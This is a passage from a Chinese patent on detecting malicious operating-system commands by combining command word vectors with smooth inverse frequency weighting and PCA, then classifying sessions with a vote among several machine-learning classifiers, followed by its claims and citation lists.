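        return sum(x * y for x, y in zip(a, b))

    scores = {w: dot(v_out[w], v_in[center]) for w in v_out}
    top = max(scores.values())  # subtract the maximum for numerical stability
    norm = sum(math.exp(s - top) for s in scores.values())
    return math.exp(scores[context] - top) / norm
```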
S4, extracting command session vectors.
Wherein, the extraction of the command session vector comprises two steps:
a) Word vector combination;
Assume that command session $s$ consists of $|s|$ words, that the word vector of each word $w_i$ is $v_{w_i}$, and that its frequency of occurrence in the whole training set is $p(w_i)$. The session vector is then:
$$V_s=\sum_{i=1}^{|s|}\frac{a}{a+p(w_i)}\,v_{w_i}$$
where $a$ is a smoothing parameter; for example, $a=10^{-3}$ may be used in this scheme.
b) Removing the public vector;
Command sessions share common semantics, and removing these common semantics makes different command sessions easier to distinguish. Therefore, the principal common vector is obtained by PCA and subtracted, and the result is used as the final command session vector.
That is, let the set of all session vectors be $\{V_s\}$. If the PCA components of $\{V_s\}$ are $\{v_1, v_2, \dots\}$, where $v_1$ is the first principal component, then the common vector is $V_c=v_1$. Finally, the command session vector is $V'_s=V_s-V_c$.
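A minimal sketch of common part removal is given below. It estimates the first principal component of the mean-centered session vectors by power iteration and then removes from each session vector its projection onto that component. Note that removing the projection is a commonly used variant that is substituted here for the direct subtraction $V_s-V_c$ described above, because the sign of a principal component is arbitrary; the function names, iteration count, and random seed are likewise assumptions.

```python
import random


def first_principal_component(vectors, iters=200, seed=0):
    """Unit-length first principal component, estimated by power iteration."""
    n, dim = len(vectors), len(vectors[0])
    mean = [sum(v[k] for v in vectors) / n for k in range(dim)]
    centered = [[v[k] - mean[k] for k in range(dim)] for v in vectors]
    rng = random.Random(seed)
    u = [rng.uniform(-1.0, 1.0) for _ in range(dim)]
    norm = sum(x * x for x in u) ** 0.5
    u = [x / norm for x in u]
    for _ in range(iters):
        # Multiply u by the covariance matrix without forming the matrix.
        proj = [sum(c[k] * u[k] for k in range(dim)) for c in centered]
        new = [sum(proj[i] * centered[i][k] for i in range(n)) / n
               for k in range(dim)]
        norm = sum(x * x for x in new) ** 0.5
        if norm == 0.0:
            break  # no variance left; keep the current direction
        u = [x / norm for x in new]
    return u


def remove_common_component(vectors):
    """Remove from every vector its projection onto the first component."""
    v1 = first_principal_component(vectors)
    cleaned = []
    for v in vectors:
        coeff = sum(a * b for a, b in zip(v, v1))
        cleaned.append([a - coeff * b for a, b in zip(v, v1)])
    return cleaned
```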
S5, command session classification.
With $V'_s$ as the feature vector of command session $s$, training and classification are performed by classifiers. This scheme adopts multi-classifier fusion: several models, including a support vector machine (Support Vector Machine, SVM), logistic regression (Logistic Regression, LR), and random forest (Random Forest), are trained in advance and fused by voting, and the result given by the majority of the classifiers is taken as the final determination. The determination is made as follows:
A single classifier c outputs whether the command session s is a malicious command. Three classifiers are taken as an example here, namely LR, SVM, and Random Forest.
LR: logistic regression
$p_{lr}(s=1\mid x)=\varphi(x^{T}s+b)$, where $\varphi(z)=\frac{1}{1+e^{-z}}$ is the sigmoid function. When $p_{lr}(s=1\mid x)>0.5$, the command is judged to be a malicious command.
SVM: support vector machine
A hyperplane is constructed from the support vectors. When $y=\sum_i y_i\alpha_i k(x_i,x)+b\ge 0$, the command is judged to be malicious, where $y_i=1$ or $-1$ is the label of support vector $x_i$, $\alpha_i$ is the coefficient of support vector $x_i$, and $k(x_i,x)$ is the inner product of the vector $x$ under test and $x_i$ in the kernel space.
Random Forest: random forest
Multiple random trees are built, and the final classification result is determined by majority voting, in which the minority yields to the majority.
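The decision rules of the individual classifiers may be illustrated as follows, assuming the model parameters have already been learned. The parameter names (`weights`, `bias`, `alphas`, and so on), the linear kernel used as the default, and the representation of trees as callables returning 0 or 1 are assumptions of this sketch.

```python
import math


def sigmoid(z):
    """Numerically stable sigmoid function."""
    if z >= 0:
        return 1.0 / (1.0 + math.exp(-z))
    e = math.exp(z)
    return e / (1.0 + e)


def dot(a, b):
    return sum(x * y for x, y in zip(a, b))


def lr_is_malicious(x, weights, bias):
    """Logistic regression: malicious when the probability exceeds 0.5."""
    return sigmoid(dot(weights, x) + bias) > 0.5


def svm_is_malicious(x, support_vectors, labels, alphas, bias, kernel=dot):
    """SVM: malicious when sum_i y_i * alpha_i * k(x_i, x) + b >= 0."""
    y = sum(yi * ai * kernel(xi, x)
            for xi, yi, ai in zip(support_vectors, labels, alphas)) + bias
    return y >= 0


def forest_is_malicious(x, trees):
    """Random forest: majority vote over trees that each return 0 or 1."""
    votes = sum(tree(x) for tree in trees)
    return votes * 2 > len(trees)
```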
S6, model fusion.
If classifier c determines that command s is a malicious command, $L_c=1$; otherwise $L_c=0$. Suppose N classifiers are used in total (N=3 in the present application), and let $L=\frac{1}{N}\sum_{c=1}^{N}L_c$. If $L\ge 0.5$, s is finally considered to be a malicious command, and an alarm is triggered.
S7, giving a warning.
When s is confirmed to be a malicious command in the preceding step, the detection device can send out alarm information to prompt that a malicious command exists in the command session s, so that management personnel can handle it in time.
The application borrows the word vector technology of NLP to detect malicious commands, and can be applied to Unix, Linux, and Windows systems. In the application, word vectors of commands are first extracted from a large number of command sessions using word vector technology (such as Word2Vec, GloVe, and the like); then all command word vectors in a command session are combined into a command session vector through smooth inverse frequency (Smooth Inverse Frequency) and PCA; finally, a classifier classifies the command session based on the command session vector to judge whether an intrusion is suspected. The scheme disclosed by the application has the following advantages:
1. The time spent on manually extracting features is saved, and the analysis of commands no longer depends on expert experience, so the model generalizes better and is more adaptable.
2. The word vector combination method of smooth inverse frequency and PCA is adopted, so the command session vector is calculated simply and quickly; compared with deep learning approaches such as convolutional neural networks, resources are saved while the accuracy remains sufficiently high.
3. An algorithm framework for malicious command detection based on command vectors is provided. Word vector training and classifier selection in the framework are not limited to the models mentioned in this scheme; any more efficient and accurate algorithm that can obtain word vectors in combination with context and classify using feature vectors can be used.
Fig. 6 is a block diagram showing a structure of an operation command detection apparatus according to an exemplary embodiment. The operation command detection means may be used in a computer device to perform all or part of the steps in the embodiments shown in fig. 2 or fig. 4. The operation command detection apparatus may include:
a session obtaining module 601, configured to obtain a target command session input in an operating system, where the target command session includes at least one operation command;
a word vector obtaining module 602, configured to obtain a word vector of each command word included in the at least one operation command;
a session vector obtaining module 603, configured to obtain a command session vector of the target command session according to the word vector of each command word;
a classification module 604, configured to process the command session vector through a classification model, to obtain a classification result, where the classification result is used to indicate whether the target command session includes a command of a specified type; the classification model is a machine learning model obtained through command session sample and annotation information training, and the annotation information is used for indicating whether the command session sample contains the specified type of command.
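Purely as an illustration of how the four modules may cooperate, the sketch below wires them together as interchangeable callables. The class name, the field names, and the whitespace split used to obtain command words are hypothetical and do not limit how modules 601 to 604 are implemented.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List

Vector = List[float]


@dataclass
class OperationCommandDetector:
    # Corresponds to session obtaining module 601.
    acquire_session: Callable[[], List[str]]
    # Corresponds to word vector obtaining module 602.
    get_word_vectors: Callable[[List[str]], Dict[str, Vector]]
    # Corresponds to session vector obtaining module 603.
    get_session_vector: Callable[[List[str], Dict[str, Vector]], Vector]
    # Corresponds to classification module 604.
    classify: Callable[[Vector], bool]

    def detect(self) -> bool:
        """Run the modules in order and return the classification result."""
        commands = self.acquire_session()
        # Assumption: command words are obtained by a plain whitespace split.
        words = [w for command in commands for w in command.split()]
        vectors = self.get_word_vectors(words)
        session_vec = self.get_session_vector(words, vectors)
        return self.classify(session_vec)
```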
Optionally, the session vector obtaining module 603 is configured to,
acquiring the frequency of each command word in a word vector training set, wherein the word vector training set is a set of word vectors corresponding to a training command session;
and according to the frequency of each command word in the word vector training set, carrying out weighted summation on the word vectors of each command word to obtain the command session vector of the target command session.
Optionally, when the word vectors of the command words are weighted and summed according to the frequency of occurrence of the command words in the word vector training set, respectively, to obtain a command session vector of the target command session, the session vector obtaining module 603 is configured to,
smoothing the frequency of each command word in the word vector training set to obtain the weight of each command word;
and carrying out weighted summation on word vectors of all the command words according to weights corresponding to all the command words respectively to obtain command session vectors of the target command session.
Optionally, the apparatus further includes:
the common part removing module is configured to remove a common part in the command session vector before the classifying module 604 processes the command session vector through a classification model to obtain a classification result, where the common part is obtained through a principal component analysis mode;
The classification module 604 is configured to process, by using the classification model, the command session vector after the common portion is removed, to obtain the classification result.
Optionally, the apparatus further includes:
and a replacing module, configured to replace a specified type element included in the at least one operation command with a specified command word before the word vector obtaining module 602 obtains the word vector of each command word included in the at least one operation command.
Optionally, the specified type element includes at least one of the following type elements:
a field consisting of consecutive digits, an internet protocol IP address, and a command ending language.
Optionally, the word vector obtaining module 602 is configured to perform a step of obtaining a word vector of each command word included in the at least one operation command when the target command session meets a filtering condition.
Optionally, the filtering conditions include at least one of the following conditions:
the corresponding command session does not contain garbled characters, the corresponding command session has the correct source, and the acquisition time of the corresponding command session is within the specified time period.
Optionally, the classification model includes n classification sub-models, n being an integer greater than or equal to 2, the classification module 604 is configured to,
Processing the command session vector through the n classification sub-models respectively to obtain classification sub-results output by the n classification sub-models respectively;
and obtaining the classification result according to the classification sub-results output by the n classification sub-models respectively.
Optionally, in the case of the classification result obtained according to the classification sub-result output by each of the n classification sub-models, the classification module 604 is configured to,
performing binarization processing on classification sub-results output by each of the n classification sub-models to obtain n binarization values;
and obtaining the average value of the n binarized values as the classification result.
Optionally, the classification sub-result is used to indicate a probability of including the specified type of command in the target command session; the classification module 604 is configured to obtain, as the classification result, an average value of probabilities indicated by the n classification sub-models, when the classification result is obtained according to the classification sub-results output by the n classification sub-models.
Optionally, the specified type of command includes a malicious command.
In summary, according to the scheme provided by the embodiment of the application, the characteristics of each word in the operation command are represented by the word vector, the command session vector of the target command session is generated based on the word vector, and whether the target command session contains the specified type command (such as the malicious command) is detected by the command session vector and the trained classification model.
Fig. 7 is a schematic diagram of a computer device, according to an example embodiment. The computer device may be implemented as the detection device 120 or other computer device in the implementation environment shown in fig. 1 described above. The computer device 700 includes a Central Processing Unit (CPU) 701, a system memory 704 including a Random Access Memory (RAM) 702 and a Read Only Memory (ROM) 703, and a system bus 705 connecting the system memory 704 and the central processing unit 701. The computer device 700 also includes a basic input/output system (I/O system) 706, which helps to transfer information between various devices within the computer, and a mass storage device 707 for storing an operating system 713, application programs 714, and other program modules 715.
The basic input/output system 706 includes a display 708 for displaying information and an input device 709, such as a mouse, keyboard, or the like, for a user to input information. Wherein the display 708 and the input device 709 are coupled to the central processing unit 701 through an input output controller 710 coupled to a system bus 705. The basic input/output system 706 may also include an input/output controller 710 for receiving and processing input from a number of other devices, such as a keyboard, mouse, or electronic stylus. Similarly, the input output controller 710 also provides output to a display screen, a printer, or other type of output device.
The mass storage device 707 is connected to the central processing unit 701 through a mass storage controller (not shown) connected to the system bus 705. The mass storage device 707 and its associated computer-readable media provide non-volatile storage for the computer device 700. That is, the mass storage device 707 may include a computer readable medium (not shown) such as a hard disk or CD-ROM drive.
The computer readable medium may include computer storage media and communication media without loss of generality. Computer storage media includes volatile and nonvolatile, removable and non-removable media implemented in any method or technology for storage of information such as computer readable instructions, data structures, program modules or other data. Computer storage media includes RAM, ROM, EPROM, EEPROM, flash memory or other solid state memory technology, CD-ROM, DVD or other optical storage, magnetic cassettes, magnetic tape, magnetic disk storage or other magnetic storage devices. Of course, those skilled in the art will recognize that the computer storage medium is not limited to the one described above. The system memory 704 and mass storage device 707 described above may be collectively referred to as memory.
The computer device 700 may be connected to the internet or other computer device through a network interface unit 711 connected to the system bus 705.
The memory further comprises one or more programs stored in the memory, and the central processor 701 implements the steps performed by the detection device in the method shown in fig. 2 or 4 by executing the one or more programs.
In exemplary embodiments, a non-transitory computer readable storage medium is also provided, such as a memory, including a computer program (instructions) executable by a processor of a computer device to perform all or part of the steps of the methods shown in the various embodiments of the application. For example, the non-transitory computer readable storage medium may be ROM, Random Access Memory (RAM), CD-ROM, magnetic tape, floppy disk, optical data storage device, etc.
Other embodiments of the application will be apparent to those skilled in the art from consideration of the specification and practice of the application disclosed herein. This application is intended to cover any variations, uses, or adaptations of the application following, in general, the principles of the application and including such departures from the present disclosure as come within known or customary practice within the art to which the application pertains. It is intended that the specification and examples be considered as exemplary only, with a true scope and spirit of the application being indicated by the following claims.
It is to be understood that the application is not limited to the precise arrangements and instrumentalities shown in the drawings, which have been described above, and that various modifications and changes may be effected without departing from the scope thereof. The scope of the application is limited only by the appended claims.

Claims (11)

1. An operation command detection method, characterized in that the method comprises:
acquiring a target command session input in an operating system, wherein the target command session comprises at least one operation command;
replacing a specified type element contained in the at least one operation command with a specified command word; the specified type element includes at least one of the following type elements: a field consisting of consecutive digits, an Internet Protocol (IP) address, and a command ending language;
acquiring word vectors of all command words contained in the at least one operation command;
acquiring the frequency of each command word in a word vector training set, wherein the word vector training set is a set of word vectors corresponding to a training command session; the word vector training set is used for training through a preset word vector training model so as to obtain word vectors of command words in the word vector training set;
Smoothing the frequency of each command word in the word vector training set to obtain the weight of each command word; according to the weights corresponding to the command words, carrying out weighted summation on word vectors of the command words to obtain command session vectors of the target command session; the smoothing processing is performed on the frequency of occurrence of each command word in the word vector training set to obtain the weight corresponding to each command word, including: dividing a smoothing coefficient by the sum of the smoothing coefficient and the frequency of the target command word for the target command word in each command word to obtain the weight corresponding to the target command word;
processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a specified type of command; the classification model is a machine learning model obtained through command session sample and annotation information training, and the annotation information is used for indicating whether the command session sample contains the specified type of command.
2. The method of claim 1, wherein before the processing the command session vector through a classification model to obtain a classification result, the method further comprises:
removing a common part in the command session vector, wherein the common part is obtained by a principal component analysis mode;
the command session vector is processed through a classification model to obtain a classification result, which comprises the following steps:
and processing the command session vector after the common part is removed through the classification model to obtain the classification result.
3. The method of claim 1, wherein the obtaining a word vector for each command word included in the at least one operation command comprises:
and executing the step of acquiring word vectors of all command words contained in the at least one operation command when the target command session meets the filtering condition.
4. A method according to claim 3, wherein the filtering conditions comprise at least one of the following conditions:
the corresponding command session does not contain garbled characters, the corresponding command session has the correct source, and the acquisition time of the corresponding command session is within the specified time period.
5. The method of claim 1, wherein the classification model includes n classification sub-models, n being an integer greater than or equal to 2, wherein the processing the command session vector through the classification model to obtain a classification result includes:
processing the command session vector through the n classification sub-models respectively to obtain classification sub-results output by the n classification sub-models respectively;
and obtaining the classification result according to the classification sub-results output by the n classification sub-models respectively.
6. The method of claim 5, wherein the obtaining the classification result according to the classification sub-results output by the n classification sub-models respectively comprises:
performing binarization processing on classification sub-results output by each of the n classification sub-models to obtain n binarization values;
and obtaining the average value of the n binarized values as the classification result.
7. The method of claim 5, wherein the classification sub-result is used to indicate a probability of including the specified type of command in the target command session; the classification result obtained according to the classification sub-results output by the n classification sub-models respectively comprises:
And obtaining the average value of the probabilities indicated by the n classification sub-models as the classification result.
8. The method of claim 1, wherein the specified type of command comprises a malicious command.
9. An operation command detection apparatus, characterized in that the apparatus comprises:
a session acquisition module, configured to acquire a target command session input in an operating system, wherein the target command session comprises at least one operation command;
a replacing module, configured to replace a specified type element contained in the at least one operation command with a specified command word; the specified type element includes at least one of the following type elements: a field consisting of consecutive digits, an Internet Protocol (IP) address, and a command ending language;
the word vector acquisition module is used for acquiring word vectors of all command words contained in the at least one operation command;
the session vector acquisition module is used for acquiring the frequency of each command word in a word vector training set, wherein the word vector training set is a set of word vectors corresponding to a training command session; the word vector training set is used for training through a preset word vector training model so as to obtain word vectors of command words in the word vector training set; smoothing the frequency of each command word in the word vector training set to obtain the weight of each command word; according to the weights corresponding to the command words, carrying out weighted summation on word vectors of the command words to obtain command session vectors of the target command session; the smoothing processing is performed on the frequency of occurrence of each command word in the word vector training set to obtain the weight corresponding to each command word, including: dividing a smoothing coefficient by the sum of the smoothing coefficient and the frequency of the target command word for the target command word in each command word to obtain the weight corresponding to the target command word;
The classification module is used for processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a command of a specified type or not; the classification model is a machine learning model obtained through command session sample and annotation information training, and the annotation information is used for indicating whether the command session sample contains the specified type of command.
10. A computer device comprising a processor and a memory, wherein the memory stores at least one instruction, at least one program, a set of codes, or a set of instructions, the at least one instruction, the at least one program, the set of codes, or the set of instructions being loaded and executed by the processor to implement the method of operation command detection as claimed in any one of claims 1 to 8.
11. A computer readable storage medium having stored therein at least one instruction, at least one program, code set, or instruction set, the at least one instruction, the at least one program, the code set, or instruction set being loaded and executed by a processor to implement the method of operation command detection as claimed in any one of claims 1 to 8.
CN201910250265.XA 2019-03-29 2019-03-29 Operation command detection method, device, computer equipment and storage medium Active CN110414229B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201910250265.XA CN110414229B (en) 2019-03-29 2019-03-29 Operation command detection method, device, computer equipment and storage medium

Publications (2)

Publication Number Publication Date
CN110414229A CN110414229A (en) 2019-11-05
CN110414229B true CN110414229B (en) 2023-12-12

Family

ID=68357562

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201910250265.XA Active CN110414229B (en) 2019-03-29 2019-03-29 Operation command detection method, device, computer equipment and storage medium

Country Status (1)

Country Link
CN (1) CN110414229B (en)

Families Citing this family (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN114548617A (en) * 2020-11-18 2022-05-27 中国移动通信集团江西有限公司 Command risk assessment method and related equipment
CN113360305A (en) * 2021-05-13 2021-09-07 杭州明实科技有限公司 Computer equipment and abnormal operation detection method, device and storage medium thereof
CN114969725A (en) * 2022-04-18 2022-08-30 中移互联网有限公司 Target command identification method and device, electronic equipment and readable storage medium
CN115499207A (en) * 2022-09-15 2022-12-20 中债金科信息技术有限公司 Intrusion detection method and device, storage medium and electronic equipment

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
WO2015079591A1 (en) * 2013-11-27 2015-06-04 Nec Corporation Crosslingual text classification method using expected frequencies
CN107844560A (en) * 2017-10-30 2018-03-27 北京锐安科技有限公司 A kind of method, apparatus of data access, computer equipment and readable storage medium storing program for executing
CN107967488A (en) * 2017-11-28 2018-04-27 网宿科技股份有限公司 The sorting technique and categorizing system of a kind of server
CN108259482A (en) * 2018-01-04 2018-07-06 平安科技(深圳)有限公司 Network Abnormal data detection method, device, computer equipment and storage medium
CN108536679A (en) * 2018-04-13 2018-09-14 腾讯科技(成都)有限公司 Name entity recognition method, device, equipment and computer readable storage medium
CN109344615A (en) * 2018-07-27 2019-02-15 北京奇虎科技有限公司 A kind of method and device detecting malicious commands
CN109492108A (en) * 2018-11-22 2019-03-19 上海唯识律简信息科技有限公司 Multi-level fusion Document Classification Method and system based on deep learning

Family Cites Families (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US7624006B2 (en) * 2004-09-15 2009-11-24 Microsoft Corporation Conditional maximum likelihood estimation of naïve bayes probability models
US9819689B2 (en) * 2015-03-13 2017-11-14 Microsoft Technology Licensing, Llc Large scale malicious process detection
US10754948B2 (en) * 2017-04-18 2020-08-25 Cylance Inc. Protecting devices from malicious files based on n-gram processing of sequential data
RU2679785C1 (en) * 2017-10-18 2019-02-12 Акционерное общество "Лаборатория Касперского" System and method of classification of objects

Also Published As

Publication number Publication date
CN110414229A (en) 2019-11-05

Similar Documents

Publication Publication Date Title
CN110414229B (en) Operation command detection method, device, computer equipment and storage medium
TWI673625B (en) Uniform resource locator (URL) attack detection method, device and electronic device
CN109583332B (en) Face recognition method, face recognition system, medium, and electronic device
CN112270196B (en) Entity relationship identification method and device and electronic equipment
CN110472675B (en) Image classification method, image classification device, storage medium and electronic equipment
CN108108743B (en) Abnormal user identification method and device for identifying abnormal user
WO2023179429A1 (en) Video data processing method and apparatus, electronic device, and storage medium
CN112200081A (en) Abnormal behavior identification method and device, electronic equipment and storage medium
CN110175851B (en) Cheating behavior detection method and device
CN109271957B (en) Face gender identification method and device
CN112507912B (en) Method and device for identifying illegal pictures
CN111475622A (en) Text classification method, device, terminal and storage medium
CN114138968B (en) Network hotspot mining method, device, equipment and storage medium
CN112052451A (en) Webshell detection method and device
CN112883990A (en) Data classification method and device, computer storage medium and electronic equipment
CN112800919A (en) Method, device and equipment for detecting target type video and storage medium
CN113051911A (en) Method, apparatus, device, medium, and program product for extracting sensitive word
Saranya Shree et al. Prediction of fake Instagram profiles using machine learning
CN115758211A (en) Text information classification method and device, electronic equipment and storage medium
CN118339550A (en) Geometric problem solving method, device, equipment and storage medium
CN115858776A (en) Variant text classification recognition method, system, storage medium and electronic equipment
CN115880702A (en) Data processing method, device, equipment, program product and storage medium
CN109670470B (en) Pedestrian relationship identification method, device and system and electronic equipment
CN111860662B (en) Training method and device, application method and device of similarity detection model
CN118134529B (en) Big data-based computer data processing method and system

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant
TG01 Patent term adjustment